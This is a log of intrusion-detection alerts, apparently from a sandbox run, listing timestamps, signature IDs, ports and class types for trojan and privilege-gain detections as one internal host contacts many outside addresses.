        Timestamp:192.168.2.23172.65.220.23039706555552027153 05/14/22-02:13:40.490274
        SID:2027153
        Source Port:39706
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.211.206.8055016802027121 05/14/22-02:12:21.658731
        SID:2027121
        Source Port:55016
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.59.17.5441456802027121 05/14/22-02:12:57.823951
        SID:2027121
        Source Port:41456
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.76.246.19645190802027121 05/14/22-02:12:09.885059
        SID:2027121
        Source Port:45190
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.209.155.9051672802027121 05/14/22-02:11:50.439816
        SID:2027121
        Source Port:51672
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.232.20460168555552027153 05/14/22-02:13:25.199760
        SID:2027153
        Source Port:60168
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.100.77.14644630802027121 05/14/22-02:12:01.373432
        SID:2027121
        Source Port:44630
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.31.22744132555552027153 05/14/22-02:11:53.487585
        SID:2027153
        Source Port:44132
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.57.72.060930802027121 05/14/22-02:12:48.985965
        SID:2027121
        Source Port:60930
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.45.15553358802027121 05/14/22-02:12:04.731576
        SID:2027121
        Source Port:53358
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.87.101.10137896802027121 05/14/22-02:12:09.913804
        SID:2027121
        Source Port:37896
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.128.23660108802027121 05/14/22-02:13:28.455410
        SID:2027121
        Source Port:60108
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.142.205.9451290802027121 05/14/22-02:11:46.047218
        SID:2027121
        Source Port:51290
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.193.167.16734318802027121 05/14/22-02:13:46.134686
        SID:2027121
        Source Port:34318
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.70.197.19856656802027121 05/14/22-02:12:31.405561
        SID:2027121
        Source Port:56656
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.164.5346232555552027153 05/14/22-02:13:23.081529
        SID:2027153
        Source Port:46232
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.225.205.13049890802027121 05/14/22-02:12:04.853611
        SID:2027121
        Source Port:49890
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.50.13952924802027121 05/14/22-02:12:08.365983
        SID:2027121
        Source Port:52924
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.241.125.9145474528692027339 05/14/22-02:12:41.657241
        SID:2027339
        Source Port:45474
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.9.125.14353942802027121 05/14/22-02:12:13.735890
        SID:2027121
        Source Port:53942
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.232.92.24755310528692027339 05/14/22-02:12:25.129479
        SID:2027339
        Source Port:55310
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.90.154.22936880802027121 05/14/22-02:12:12.602828
        SID:2027121
        Source Port:36880
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.15.13056598802027121 05/14/22-02:12:21.676533
        SID:2027121
        Source Port:56598
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.142.10.21251574802027121 05/14/22-02:12:25.898635
        SID:2027121
        Source Port:51574
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.110.175.2748086802027121 05/14/22-02:11:50.439638
        SID:2027121
        Source Port:48086
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.36.21353936802027121 05/14/22-02:12:03.575828
        SID:2027121
        Source Port:53936
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.218.17560614802027121 05/14/22-02:12:33.782516
        SID:2027121
        Source Port:60614
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.140.158.2838122802027121 05/14/22-02:11:46.150628
        SID:2027121
        Source Port:38122
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.163.132.2455816802027121 05/14/22-02:11:52.586510
        SID:2027121
        Source Port:55816
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.206.17358940555552027153 05/14/22-02:12:01.300119
        SID:2027153
        Source Port:58940
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.177.13744728555552027153 05/14/22-02:13:32.012600
        SID:2027153
        Source Port:44728
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.179.233.6956756802027121 05/14/22-02:11:48.288985
        SID:2027121
        Source Port:56756
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.2.844980555552027153 05/14/22-02:12:11.570145
        SID:2027153
        Source Port:44980
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.117.6952368555552027153 05/14/22-02:13:43.822344
        SID:2027153
        Source Port:52368
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.159.7.4138836802027121 05/14/22-02:11:52.872714
        SID:2027121
        Source Port:38836
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.89.23448884555552027153 05/14/22-02:12:00.125203
        SID:2027153
        Source Port:48884
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.57.98.21044138802027121 05/14/22-02:13:14.994328
        SID:2027121
        Source Port:44138
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.110.232.9756464802027121 05/14/22-02:11:55.012285
        SID:2027121
        Source Port:56464
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.8.72.19347014802027121 05/14/22-02:11:55.040749
        SID:2027121
        Source Port:47014
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.47.97.7036228802027121 05/14/22-02:12:03.534557
        SID:2027121
        Source Port:36228
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.37.24335642555552027153 05/14/22-02:12:06.228008
        SID:2027153
        Source Port:35642
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.182.120.23638966802027121 05/14/22-02:11:50.412772
        SID:2027121
        Source Port:38966
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.10.053968555552027153 05/14/22-02:12:11.587321
        SID:2027153
        Source Port:53968
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.154.112.12243126802027121 05/14/22-02:12:24.008186
        SID:2027121
        Source Port:43126
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.203.4046200802027121 05/14/22-02:12:36.296341
        SID:2027121
        Source Port:46200
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.99.143.5535064802027121 05/14/22-02:12:39.835523
        SID:2027121
        Source Port:35064
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.134.255.2857518802027121 05/14/22-02:11:48.410937
        SID:2027121
        Source Port:57518
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.226.106.12749420528692027339 05/14/22-02:12:59.756210
        SID:2027339
        Source Port:49420
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.241.77.21936828528692027339 05/14/22-02:12:37.410964
        SID:2027339
        Source Port:36828
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.147.125.1157218802027121 05/14/22-02:12:43.278898
        SID:2027121
        Source Port:57218
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.159.31.9139228802027121 05/14/22-02:12:57.701159
        SID:2027121
        Source Port:39228
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.33.10038818802027121 05/14/22-02:11:52.573122
        SID:2027121
        Source Port:38818
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.154.14133290802027121 05/14/22-02:11:55.048182
        SID:2027121
        Source Port:33290
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.181.216.18039938802027121 05/14/22-02:12:08.396424
        SID:2027121
        Source Port:39938
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.239.20157596555552027153 05/14/22-02:12:36.880675
        SID:2027153
        Source Port:57596
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.58.3.1548388802027121 05/14/22-02:13:22.563201
        SID:2027121
        Source Port:48388
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.57.255.13244390802027121 05/14/22-02:12:33.932176
        SID:2027121
        Source Port:44390
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.154.52.14257790802027121 05/14/22-02:13:00.782189
        SID:2027121
        Source Port:57790
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.95.17957846802027121 05/14/22-02:12:03.507219
        SID:2027121
        Source Port:57846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.140.153.15856040802027121 05/14/22-02:12:28.223713
        SID:2027121
        Source Port:56040
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.108.14133886555552027153 05/14/22-02:12:33.795226
        SID:2027153
        Source Port:33886
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23156.225.158.3853788528692027339 05/14/22-02:12:20.524009
        SID:2027339
        Source Port:53788
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.250.15.17939434528692027339 05/14/22-02:12:33.756550
        SID:2027339
        Source Port:39434
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.50.16159636802027121 05/14/22-02:12:12.544980
        SID:2027121
        Source Port:59636
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.217.114.19941138802027121 05/14/22-02:12:33.730021
        SID:2027121
        Source Port:41138
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.21.50.339374802027121 05/14/22-02:12:04.793956
        SID:2027121
        Source Port:39374
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.99.15639658555552027153 05/14/22-02:12:07.296438
        SID:2027153
        Source Port:39658
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.65.49.5341268802027121 05/14/22-02:12:31.453562
        SID:2027121
        Source Port:41268
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.161.25046236555552027153 05/14/22-02:12:11.570256
        SID:2027153
        Source Port:46236
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.183.206.250534802027121 05/14/22-02:12:12.345070
        SID:2027121
        Source Port:50534
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.29.14935424555552027153 05/14/22-02:13:03.185493
        SID:2027153
        Source Port:35424
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.56.57.11935020802027121 05/14/22-02:13:09.123139
        SID:2027121
        Source Port:35020
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.3.12749930555552027153 05/14/22-02:13:09.596926
        SID:2027153
        Source Port:49930
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.101.190.17742846802027121 05/14/22-02:12:12.333017
        SID:2027121
        Source Port:42846
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.136.10545390802027121 05/14/22-02:12:38.435082
        SID:2027121
        Source Port:45390
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.227.17041112802027121 05/14/22-02:12:12.383299
        SID:2027121
        Source Port:41112
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.30.250.18660900802027121 05/14/22-02:12:41.134897
        SID:2027121
        Source Port:60900
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.110.219.25258002802027121 05/14/22-02:12:06.988408
        SID:2027121
        Source Port:58002
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.250.93.9246958528692027339 05/14/22-02:12:13.854287
        SID:2027339
        Source Port:46958
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.179.13846560555552027153 05/14/22-02:13:25.217133
        SID:2027153
        Source Port:46560
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.130.158.8946304802027121 05/14/22-02:11:48.322037
        SID:2027121
        Source Port:46304
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.196.4033988555552027153 05/14/22-02:12:00.108181
        SID:2027153
        Source Port:33988
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.56.15.14946206802027121 05/14/22-02:12:33.933501
        SID:2027121
        Source Port:46206
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.164.211.13740294802027121 05/14/22-02:12:23.952380
        SID:2027121
        Source Port:40294
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.59.240.14948520802027121 05/14/22-02:11:58.029242
        SID:2027121
        Source Port:48520
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.179.190.9935494802027121 05/14/22-02:11:48.314156
        SID:2027121
        Source Port:35494
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.183.11.24036174802027121 05/14/22-02:11:52.658094
        SID:2027121
        Source Port:36174
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.216.24.12135232802027121 05/14/22-02:12:18.537644
        SID:2027121
        Source Port:35232
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23197.214.98.18056372372152835222 05/14/22-02:12:31.482188
        SID:2835222
        Source Port:56372
        Destination Port:37215
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.130.253.2236174802027121 05/14/22-02:11:57.640340
        SID:2027121
        Source Port:36174
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.96.4351198555552027153 05/14/22-02:13:43.804838
        SID:2027153
        Source Port:51198
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.250.149.8654382802027121 05/14/22-02:12:38.401526
        SID:2027121
        Source Port:54382
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.63.12143308555552027153 05/14/22-02:13:00.154647
        SID:2027153
        Source Port:43308
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.217.58.15941126802027121 05/14/22-02:12:01.397400
        SID:2027121
        Source Port:41126
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.6.91.3641418802027121 05/14/22-02:12:07.016180
        SID:2027121
        Source Port:41418
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.111.197.18852578802027121 05/14/22-02:12:34.070826
        SID:2027121
        Source Port:52578
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2388.83.108.14946180802027121 05/14/22-02:13:39.640695
        SID:2027121
        Source Port:46180
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.227.161.2454070802027121 05/14/22-02:13:29.632794
        SID:2027121
        Source Port:54070
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.255.117.23858354802027121 05/14/22-02:12:53.425616
        SID:2027121
        Source Port:58354
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.179.234.3754506802027121 05/14/22-02:12:07.018103
        SID:2027121
        Source Port:54506
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.9.225.10248152802027121 05/14/22-02:11:48.334081
        SID:2027121
        Source Port:48152
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.164.218.19550980802027121 05/14/22-02:11:52.750159
        SID:2027121
        Source Port:50980
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.248.24245400555552027153 05/14/22-02:13:08.573609
        SID:2027153
        Source Port:45400
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.238.139.1348666802027121 05/14/22-02:12:25.914760
        SID:2027121
        Source Port:48666
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.179.247.15952292802027121 05/14/22-02:12:04.767954
        SID:2027121
        Source Port:52292
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.47.23260828555552027153 05/14/22-02:12:26.254915
        SID:2027153
        Source Port:60828
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2388.208.78.17954476802027121 05/14/22-02:13:11.528734
        SID:2027121
        Source Port:54476
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.155.229.23450038802027121 05/14/22-02:12:47.723727
        SID:2027121
        Source Port:50038
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.33.10038886802027121 05/14/22-02:11:53.949765
        SID:2027121
        Source Port:38886
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.159.55.21435902802027121 05/14/22-02:13:17.206694
        SID:2027121
        Source Port:35902
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.163.12.16845128802027121 05/14/22-02:12:38.483919
        SID:2027121
        Source Port:45128
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.238.47.1252070528692027339 05/14/22-02:12:00.693831
        SID:2027339
        Source Port:52070
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.80.200.20139330802027121 05/14/22-02:12:36.296587
        SID:2027121
        Source Port:39330
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.254.110.8237370528692027339 05/14/22-02:13:45.786874
        SID:2027339
        Source Port:37370
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.154.210.9359854802027121 05/14/22-02:11:45.992850
        SID:2027121
        Source Port:59854
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.100.125.8853800802027121 05/14/22-02:12:25.889391
        SID:2027121
        Source Port:53800
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.48.14949556555552027153 05/14/22-02:12:40.957123
        SID:2027153
        Source Port:49556
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.35.23239748555552027153 05/14/22-02:12:51.437608
        SID:2027153
        Source Port:39748
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23156.247.19.19837608528692027339 05/14/22-02:12:24.973762
        SID:2027339
        Source Port:37608
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.154.49.5858606802027121 05/14/22-02:12:28.144267
        SID:2027121
        Source Port:58606
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.223.48.4155004802027121 05/14/22-02:11:45.963936
        SID:2027121
        Source Port:55004
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.74.11136330555552027153 05/14/22-02:13:08.554571
        SID:2027153
        Source Port:36330
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.217.212.15044942802027121 05/14/22-02:12:06.989043
        SID:2027121
        Source Port:44942
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.58.2.16337560802027121 05/14/22-02:13:23.571844
        SID:2027121
        Source Port:37560
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.226.87.8944194528692027339 05/14/22-02:13:39.931274
        SID:2027339
        Source Port:44194
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.211.210.5351742802027121 05/14/22-02:12:12.345964
        SID:2027121
        Source Port:51742
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.217.237.9747216802027121 05/14/22-02:12:33.770644
        SID:2027121
        Source Port:47216
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.239.8641954555552027153 05/14/22-02:12:16.079208
        SID:2027153
        Source Port:41954
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.211.229.20751322802027121 05/14/22-02:12:31.379545
        SID:2027121
        Source Port:51322
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.154.15835774802027121 05/14/22-02:12:38.368211
        SID:2027121
        Source Port:35774
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.154.100.7638420802027121 05/14/22-02:12:13.843893
        SID:2027121
        Source Port:38420
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.169.10939674555552027153 05/14/22-02:12:39.774899
        SID:2027153
        Source Port:39674
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.231.233364555552027153 05/14/22-02:13:09.597097
        SID:2027153
        Source Port:33364
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.57.97.6840424802027121 05/14/22-02:13:39.679280
        SID:2027121
        Source Port:40424
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.140.152.23150056802027121 05/14/22-02:12:01.355884
        SID:2027121
        Source Port:50056
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.245.58.19151136528692027339 05/14/22-02:13:43.469946
        SID:2027339
        Source Port:51136
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.97.1744422802027121 05/14/22-02:12:41.078436
        SID:2027121
        Source Port:44422
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.245.60.19934734555552027153 05/14/22-02:12:33.796503
        SID:2027153
        Source Port:34734
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.217.167.13447040802027121 05/14/22-02:11:46.033771
        SID:2027121
        Source Port:47040
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.215.156.6752884802027121 05/14/22-02:12:16.318734
        SID:2027121
        Source Port:52884
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.101.46.19048630802027121 05/14/22-02:12:21.650694
        SID:2027121
        Source Port:48630
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.217.235.13641662802027121 05/14/22-02:12:33.688261
        SID:2027121
        Source Port:41662
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.233.89.22138802802027121 05/14/22-02:12:23.904902
        SID:2027121
        Source Port:38802
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.62.17956852555552027153 05/14/22-02:13:43.822168
        SID:2027153
        Source Port:56852
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.232.143.20460296802027121 05/14/22-02:12:18.496747
        SID:2027121
        Source Port:60296
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23156.230.26.19155878528692027339 05/14/22-02:11:53.192069
        SID:2027339
        Source Port:55878
        Destination Port:52869
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.94.18738124555552027153 05/14/22-02:12:18.507683
        SID:2027153
        Source Port:38124
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.128.154408555552027153 05/14/22-02:12:33.812550
        SID:2027153
        Source Port:54408
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2398.156.215.14960094555552027153 05/14/22-02:12:39.490306
        SID:2027153
        Source Port:60094
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.185.13355574555552027153 05/14/22-02:12:13.767472
        SID:2027153
        Source Port:55574
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.84.3757214555552027153 05/14/22-02:13:39.278830
        SID:2027153
        Source Port:57214
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.23172.65.96.15238076555552027153 05/14/22-02:12:00.125302
        SID:2027153
        Source Port:38076
        Destination Port:55555
        Protocol:TCP
        Classtype:Attempted Administrator Privilege Gain
        Timestamp:192.168.2.2395.140.158.5644624802027121 05/14/22-02:12:04.825916
        SID:2027121
        Source Port:44624
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.2395.213.221.7259042802027121 05/14/22-02:12:07.007532
        SID:2027121
        Source Port:59042
        Destination Port:80
        Protocol:TCP
        Classtype:A Network Trojan was detected
        Timestamp:192.168.2.23172.65.3.8833946555552027153 05/14/22-02:12:09.369030
        SID:2027153
        Source Port:33946
        Destination Port:55555
        Protocol:TCP
